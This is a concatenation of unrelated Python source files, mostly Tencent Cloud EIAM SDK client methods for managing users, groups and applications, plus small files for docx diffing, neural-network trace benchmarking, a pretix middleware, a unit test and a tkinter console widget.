code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeAppAccount(self, request): """查询应用账号列表 :param request: Request instance for DescribeAppAccount. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeAppAccountRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeAppAccountResponse` """ try: params = request._serialize() body = self.call("DescribeAppAccount", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeAppAccountResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeApplication(self, request): """获取一个应用的信息。 :param request: Request instance for DescribeApplication. 
:type request: :class:`tencentcloud.eiam.v20210420.models.DescribeApplicationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeApplicationResponse` """ try: params = request._serialize() body = self.call("DescribeApplication", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeApplicationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeOrgNode(self, request): """根据机构节点ID读取机构节点信息 :param request: Request instance for DescribeOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeOrgNodeResponse` """ try: params = request._serialize() body = self.call("DescribeOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeOrgResourcesAuthorization(self, request): """查询指定机构下的资源授权列表 :param request: Request instance for DescribeOrgResourcesAuthorization. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeOrgResourcesAuthorizationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeOrgResourcesAuthorizationResponse` """ try: params = request._serialize() body = self.call("DescribeOrgResourcesAuthorization", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeOrgResourcesAuthorizationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribePublicKey(self, request): """获取JWT公钥信息。 :param request: Request instance for DescribePublicKey. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribePublicKeyRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribePublicKeyResponse` """ try: params = request._serialize() body = self.call("DescribePublicKey", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribePublicKeyResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserGroup(self, request): """获取用户组信息 :param request: Request instance for DescribeUserGroup. 
:type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserGroupResponse` """ try: params = request._serialize() body = self.call("DescribeUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserGroupResourcesAuthorization(self, request): """查询指定用户组下的资源授权列表 :param request: Request instance for DescribeUserGroupResourcesAuthorization. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserGroupResourcesAuthorizationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserGroupResourcesAuthorizationResponse` """ try: params = request._serialize() body = self.call("DescribeUserGroupResourcesAuthorization", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserGroupResourcesAuthorizationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserInfo(self, request): """通过用户名或用户 id 搜索用户 :param request: Request instance for DescribeUserInfo. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserInfoRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserInfoResponse` """ try: params = request._serialize() body = self.call("DescribeUserInfo", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserInfoResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserResourcesAuthorization(self, request): """查询指定用户下的资源授权列表 :param request: Request instance for DescribeUserResourcesAuthorization. 
:type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserResourcesAuthorizationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserResourcesAuthorizationResponse` """ try: params = request._serialize() body = self.call("DescribeUserResourcesAuthorization", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserResourcesAuthorizationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserThirdPartyAccountInfo(self, request): """通过用户名或用户 id 获取用户的第三方账号绑定信息。 :param request: Request instance for DescribeUserThirdPartyAccountInfo. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserThirdPartyAccountInfoRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserThirdPartyAccountInfoResponse` """ try: params = request._serialize() body = self.call("DescribeUserThirdPartyAccountInfo", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserThirdPartyAccountInfoResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListAccountInAccountGroup(self, request): """获取账号组中的账号列表 :param request: Request instance for ListAccountInAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.ListAccountInAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListAccountInAccountGroupResponse` """ try: params = request._serialize() body = self.call("ListAccountInAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListAccountInAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListApplicationAuthorizations(self, request): """应用授权关系列表(含搜索条件匹配)。 :param request: Request instance for ListApplicationAuthorizations. 
:type request: :class:`tencentcloud.eiam.v20210420.models.ListApplicationAuthorizationsRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListApplicationAuthorizationsResponse` """ try: params = request._serialize() body = self.call("ListApplicationAuthorizations", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListApplicationAuthorizationsResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListApplications(self, request): """获取应用列表信息。 :param request: Request instance for ListApplications. :type request: :class:`tencentcloud.eiam.v20210420.models.ListApplicationsRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListApplicationsResponse` """ try: params = request._serialize() body = self.call("ListApplications", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListApplicationsResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListAuthorizedApplicationsToOrgNode(self, request): """通过机构节点ID获得被授权访问的应用列表。 :param request: Request instance for ListAuthorizedApplicationsToOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToOrgNodeResponse` """ try: params = request._serialize() body = self.call("ListAuthorizedApplicationsToOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListAuthorizedApplicationsToOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListAuthorizedApplicationsToUser(self, request): """通过用户ID获得被授权访问的应用列表。 :param request: Request instance for ListAuthorizedApplicationsToUser. 
:type request: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToUserRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToUserResponse` """ try: params = request._serialize() body = self.call("ListAuthorizedApplicationsToUser", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListAuthorizedApplicationsToUserResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListAuthorizedApplicationsToUserGroup(self, request): """通过用户组ID获得被授权访问的应用列表。 :param request: Request instance for ListAuthorizedApplicationsToUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToUserGroupResponse` """ try: params = request._serialize() body = self.call("ListAuthorizedApplicationsToUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListAuthorizedApplicationsToUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUserGroups(self, request): """获取用户组列表信息(包含查询条件)。 :param request: Request instance for ListUserGroups. :type request: :class:`tencentcloud.eiam.v20210420.models.ListUserGroupsRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUserGroupsResponse` """ try: params = request._serialize() body = self.call("ListUserGroups", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUserGroupsResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUserGroupsOfUser(self, request): """获取用户所在的用户组列表 :param request: Request instance for ListUserGroupsOfUser. 
:type request: :class:`tencentcloud.eiam.v20210420.models.ListUserGroupsOfUserRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUserGroupsOfUserResponse` """ try: params = request._serialize() body = self.call("ListUserGroupsOfUser", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUserGroupsOfUserResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUsers(self, request): """获取用户列表信息。 :param request: Request instance for ListUsers. :type request: :class:`tencentcloud.eiam.v20210420.models.ListUsersRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUsersResponse` """ try: params = request._serialize() body = self.call("ListUsers", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUsersResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUsersInOrgNode(self, request): """根据机构节点ID读取节点下用户 :param request: Request instance for ListUsersInOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.ListUsersInOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUsersInOrgNodeResponse` """ try: params = request._serialize() body = self.call("ListUsersInOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUsersInOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUsersInUserGroup(self, request): """获取用户组中的用户列表 :param request: Request instance for ListUsersInUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.ListUsersInUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUsersInUserGroupResponse` """ try: params = request._serialize() body = self.call("ListUsersInUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUsersInUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ModifyAccountGroup(self, request): """修改账号组 :param request: Request instance for ModifyAccountGroup. 
:type request: :class:`tencentcloud.eiam.v20210420.models.ModifyAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ModifyAccountGroupResponse` """ try: params = request._serialize() body = self.call("ModifyAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ModifyAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ModifyAppAccount(self, request): """修改应用账号 :param request: Request instance for ModifyAppAccount. :type request: :class:`tencentcloud.eiam.v20210420.models.ModifyAppAccountRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ModifyAppAccountResponse` """ try: params = request._serialize() body = self.call("ModifyAppAccount", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ModifyAppAccountResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ModifyApplication(self, request): """更新一个应用的信息 :param request: Request instance for ModifyApplication. :type request: :class:`tencentcloud.eiam.v20210420.models.ModifyApplicationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ModifyApplicationResponse` """ try: params = request._serialize() body = self.call("ModifyApplication", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ModifyApplicationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ModifyUserInfo(self, request): """通过用户名或用户 id 冻结用户 :param request: Request instance for ModifyUserInfo. :type request: :class:`tencentcloud.eiam.v20210420.models.ModifyUserInfoRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ModifyUserInfoResponse` """ try: params = request._serialize() body = self.call("ModifyUserInfo", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ModifyUserInfoResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def RemoveAccountFromAccountGroup(self, request): """从账号组中移除账号 :param request: Request instance for RemoveAccountFromAccountGroup. 
:type request: :class:`tencentcloud.eiam.v20210420.models.RemoveAccountFromAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.RemoveAccountFromAccountGroupResponse` """ try: params = request._serialize() body = self.call("RemoveAccountFromAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.RemoveAccountFromAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def RemoveUserFromUserGroup(self, request): """从用户组中移除用户 :param request: Request instance for RemoveUserFromUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.RemoveUserFromUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.RemoveUserFromUserGroupResponse` """ try: params = request._serialize() body = self.call("RemoveUserFromUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.RemoveUserFromUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def UpdateOrgNode(self, request): """新建一个机构节点, :param request: Request instance for UpdateOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.UpdateOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.UpdateOrgNodeResponse` """ try: params = request._serialize() body = self.call("UpdateOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.UpdateOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message)# coding: utf-8 import dirdiff, filediff import logging # convenience aliases for os.path functions from pathutils import mkdir, mkpath, experiments_abs, experiments_rel from specimen import Specimen LEFT = 0 RIGHT = 1 logger = logging.getLogger(__name__) class Experiment (object): def __init__(self, left_name, right_name): self.name = "{}_{}".format(left_name, right_name) self.logger = logging.getLogger('EXP: ' + self.name) self.logger.debug("Setting up specimens") self.left = Specimen(left_name) self.logger.info("Left specimen set to {}".format(self.left)) self.right = Specimen(right_name) self.logger.info("Right specimen set to {}".format(self.right)) self.path = experiments_abs(self.name) self.logger.info("Path set to {}".format(self.path)) self.docx = (self.left.docx, self.right.docx) self.logger.debug("Docx files set to {} and {}".format(*self.docx)) self.ugly = (self.left.ugly, self.right.ugly) self.logger.debug("Ugly directories set to {} and {}".format(*self.ugly)) self.pretty = (self.left.pretty, self.right.pretty) 
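# The EiamClient methods above all follow the same pattern: serialize the
# request model, send it via self.call, then either deserialize the JSON body
# into a response model or raise TencentCloudSDKException carrying the error
# code, message and request id. A minimal usage sketch of that client,
# assuming the standard tencentcloud credential/client modules; the secret
# values and the region string are placeholders, not values from this file:
import json

from tencentcloud.common import credential
from tencentcloud.common.exception.tencent_cloud_sdk_exception import (
    TencentCloudSDKException,
)
from tencentcloud.eiam.v20210420 import eiam_client, models


def list_users_sketch(secret_id, secret_key):
    cred = credential.Credential(secret_id, secret_key)
    client = eiam_client.EiamClient(cred, "ap-guangzhou")  # region is an assumption
    req = models.ListUsersRequest()
    try:
        resp = client.ListUsers(req)
        # response models expose to_json_string() for quick inspection
        return json.loads(resp.to_json_string())
    except TencentCloudSDKException as err:
        # the code/message/request id were attached inside the client method
        print("EIAM call failed:", err)
        return None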
self.logger.debug("Pretty directories set to {} and {}".format(*self.pretty)) self.uglies = (self.left.uglies, self.right.uglies) self.logger.debug("Pretty files set to {} and {}".format(*self.uglies)) self.pretties = (self.left.pretties, self.right.pretties) self.logger.debug("Pretty files set to {} and {}".format(*self.pretties)) # essential progression def extract_left(self): self.logger.debug("Extracting left specimen") self.left.extract() def extract_right(self): self.logger.debug("Extracting right specimen") self.right.extract() def prettify_left(self): self.logger.debug("Prettifying left specimen") self.left.prettify() def prettify_right(self): self.logger.debug("Prettifying right specimen") self.right.prettify() def write_diff_reports(self): mkdir(self.path) changed = self.get_changed() for f in changed: diffs = filediff.get_diff_battery(self._left(f), self._right(f)) for diff in diffs: diff.write(self.path, f) def get_common(self): common = dirdiff.get_common(self.left.pretty, self.right.pretty) self.logger.info("Got common files: {}".format(common)) return common def get_changed(self): changed = [f for f in self.get_common() if filediff.changed(self._left(f), self._right(f))] self.logger.info("Got changed files: {}".format(changed)) return changed # path aliases for convenience def _left(self, f): path = mkpath(self.left.pretty, f) self.logger.debug("Left path requested: {}".format(path)) return path def _right(self, f): path = mkpath(self.right.pretty, f) self.logger.debug("Right path requested: {}".format(path)) return path def _exp(self, f): path = mkpath(self.path, f) self.logger.debug("Exp path requested: {}".format(path)) return path 10-100 import time import timeit from functools import partial from nninst import mode from nninst.backend.tensorflow.attack.calc_per_layer_metrics import ( get_per_layer_metrics, ) from nninst.backend.tensorflow.dataset import imagenet_raw from nninst.backend.tensorflow.graph import model_fn_with_fetch_hook from nninst.backend.tensorflow.model.config import ALEXNET from nninst.backend.tensorflow.trace.common import reconstruct_trace_from_tf_v2 from nninst.dataset.envs import IMAGENET_RAW_DIR from nninst.op import Conv2dOp from nninst.trace import ( get_per_input_unstructured_trace, get_per_receptive_field_unstructured_trace, get_trace, get_type2_trace, get_type3_trace, get_type4_trace, get_type7_trace, get_unstructured_trace, ) from nninst.utils.fs import abspath from nninst.utils.numpy import arg_approx, arg_sorted_topk class MyTimer: def __init__(self): self.start = time.time() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): end = time.time() runtime = end - self.start msg = "The block took {time} seconds to complete" print(msg.format(time=runtime)) def benchmark_trace(): rank = 1 class_id = 1 image_id = 0 threshold = 0.5 per_channel = False model_config = ALEXNET.with_model_dir("tf/alexnet/model_import") # model_config = RESNET_50 # model_config = VGG_16 mode.check(False) data_dir = IMAGENET_RAW_DIR model_dir = abspath(model_config.model_dir) create_model = lambda: model_config.network_class() graph = model_config.network_class.graph().load() model_fn = partial(model_fn_with_fetch_hook, create_model=create_model, graph=graph) # predicted_label = predict( # create_model=create_model, # input_fn=input_fn, # model_dir=model_dir, # ) # # if predicted_label != class_id: # return None conv_op_count = 0 def stop_hook(op): nonlocal conv_op_count if isinstance(op, Conv2dOp): conv_op_count += 1 if conv_op_count >= 2: 
return True else: return False # reconstruct_trace_from_tf( # class_id=class_id, # model_fn=model_fn, # input_fn=input_fn, # select_fn=lambda input: arg_approx(input, threshold), # model_dir=model_dir, # per_channel=per_channel, # # stop_hook=stop_hook, # ) per_layer_metrics = lambda: get_per_layer_metrics(ALEXNET, threshold=0.5) for trace_fn in [ get_trace, partial(get_type2_trace, output_threshold=per_layer_metrics()), partial(get_type3_trace, input_threshold=per_layer_metrics()), partial( get_type4_trace, output_threshold=per_layer_metrics(), input_threshold=per_layer_metrics(), ), partial(get_unstructured_trace, density=per_layer_metrics()), partial( get_per_receptive_field_unstructured_trace, output_threshold=per_layer_metrics(), ), partial( get_type7_trace, density=per_layer_metrics(), input_threshold=per_layer_metrics(), ), partial( get_per_input_unstructured_trace, output_threshold=per_layer_metrics(), input_threshold=per_layer_metrics(), ), ]: with MyTimer(): for class_id in range(1, 11): input_fn = lambda: imagenet_raw.test( data_dir, class_id, image_id, class_from_zero=model_config.class_from_zero, preprocessing_fn=model_config.preprocessing_fn, ) reconstruct_trace_from_tf_v2( model_fn=model_fn, input_fn=input_fn, trace_fn=partial( trace_fn, select_fn=lambda input: arg_approx(input, threshold), select_seed_fn=lambda output: arg_sorted_topk(output, rank)[ rank - 1 : rank ], ), model_dir=model_dir, class_id=class_id, rank=rank, ) if __name__ == "__main__": benchmark_trace() src/pretix/presale/middleware.py from django.core.urlresolvers import resolve from django.http import HttpResponseNotFound from pretix.base.models import Event class EventMiddleware: def process_request(self, request): url = resolve(request.path_info) url_namespace = url.namespace url_name = url.url_name if url_namespace != 'presale': return if 'event.' in url_name and 'event' in url.kwargs: try: request.event = Event.objects.current.filter( slug=url.kwargs['event'], organizer__slug=url.kwargs['organizer'], ).select_related('organizer')[0] except IndexError: return HttpResponseNotFound() # TODO: Provide error message import subprocess import unittest EXPECTED_OUTPUT = """Lisa: $-93 Quincy: error Tom: $500 """ class CreditCardTest(unittest.TestCase): def test_output(self): output = subprocess.check_output( ['credit-card', 'test/fixtures/input.txt'], universal_newlines=True ) self.assertEqual(EXPECTED_OUTPUT, output) import struct import chain def apply(receiver, code, action): contract = chain.s2n('calltest1') args = struct.pack('QQ', contract, 1) ret = chain.call_contract('helloworld12', args) print('+++call contract return:', len(ret), ret) ret = int.from_bytes(ret, 'little') print(ret) assert ret == 2 Fakor/HojDoj import tkinter as tk import subprocess import queue import os from threading import Thread class Console(tk.Frame): def __init__(self,parent=None): tk.Frame.__init__(self, parent) self.parent = parent self.create_widgets() # get the path to the console.py file assuming it is in the same folder console_path = os.path.join(os.path.dirname(__file__),"console.py") # open the console.py file (replace the path to python with the correct one for your system) # e.g. 
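# benchmark_trace above wraps each trace_fn loop in MyTimer, a small context
# manager that records a start time when constructed and prints the elapsed
# wall time on __exit__. A self-contained sketch of the same idea using
# time.perf_counter(), which is a monotonic clock better suited to timing
# than time.time(); the workload being timed here is only a placeholder:
import time


class BlockTimer:
    def __enter__(self):
        self.start = time.perf_counter()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        elapsed = time.perf_counter() - self.start
        print("The block took {:.3f} seconds to complete".format(elapsed))
        # returning None (falsy) lets any exception propagate, as MyTimer does


if __name__ == "__main__":
    with BlockTimer():
        sum(i * i for i in range(10**6))  # placeholder workload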
it might be "C:\\Python35\\python" self.p = subprocess.Popen(["python3",console_path], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) # make queues for keeping stdout and stderr whilst it is transferred between threads self.outQueue = queue.Queue() self.errQueue = queue.Queue() # keep track of where any line that is submitted starts self.line_start = 0 # make the enter key call the self.enter function self.ttyText.bind("",self.enter) # a daemon to keep track of the threads so they can stop running self.alive = True # start the functions that get stdout and stderr in separate threads Thread(target=self.read_from_proccess_out).start() Thread(target=self.read_from_process_err).start() # start the write loop in the main thread self.write_loop() self.pack(fill=tk.BOTH, expand=True) def destroy(self): """ This is the function that is automatically called when the widget is destroyed. """ self.alive=False # write exit() to the console in order to stop it running self.p.stdin.write("exit()\n".encode()) self.p.stdin.flush() # call the destroy methods to properly destroy widgets self.ttyText.destroy() tk.Frame.destroy(self) def enter(self,e): """ The key press handler """ string = self.ttyText.get(1.0, tk.END)[self.line_start:] self.line_start+=len(string) self.p.stdin.write(string.encode()) self.p.stdin.flush() def read_from_proccess_out(self): """ To be executed in a separate thread to make read non-blocking """ while self.alive: data = self.p.stdout.raw.read(1024).decode() self.outQueue.put(data) def read_from_process_err(self): """ To be executed in a separate thread to make read non-blocking """ while self.alive: data = self.p.stderr.raw.read(1024).decode() self.errQueue.put(data) def write_loop(self): """ Used to write data from stdout and stderr to the Text widget """ # if there is anything to write from stdout or stderr, then write it if not self.errQueue.empty(): self.write(self.errQueue.get()) if not self.outQueue.empty(): self.write(self.outQueue.get()) # run this method again after 10ms if self.alive: self.after(10, self.write_loop) def write(self,string): self.ttyText.insert(tk.END, string) self.ttyText.see(tk.END) self.line_start+=len(string) def create_widgets(self): self.ttyText = tk.Text(self, wrap=tk.WORD) self.ttyText.pack(fill=tk.BOTH,expand=True) if __name__ == '__main__': root = tk.Tk() 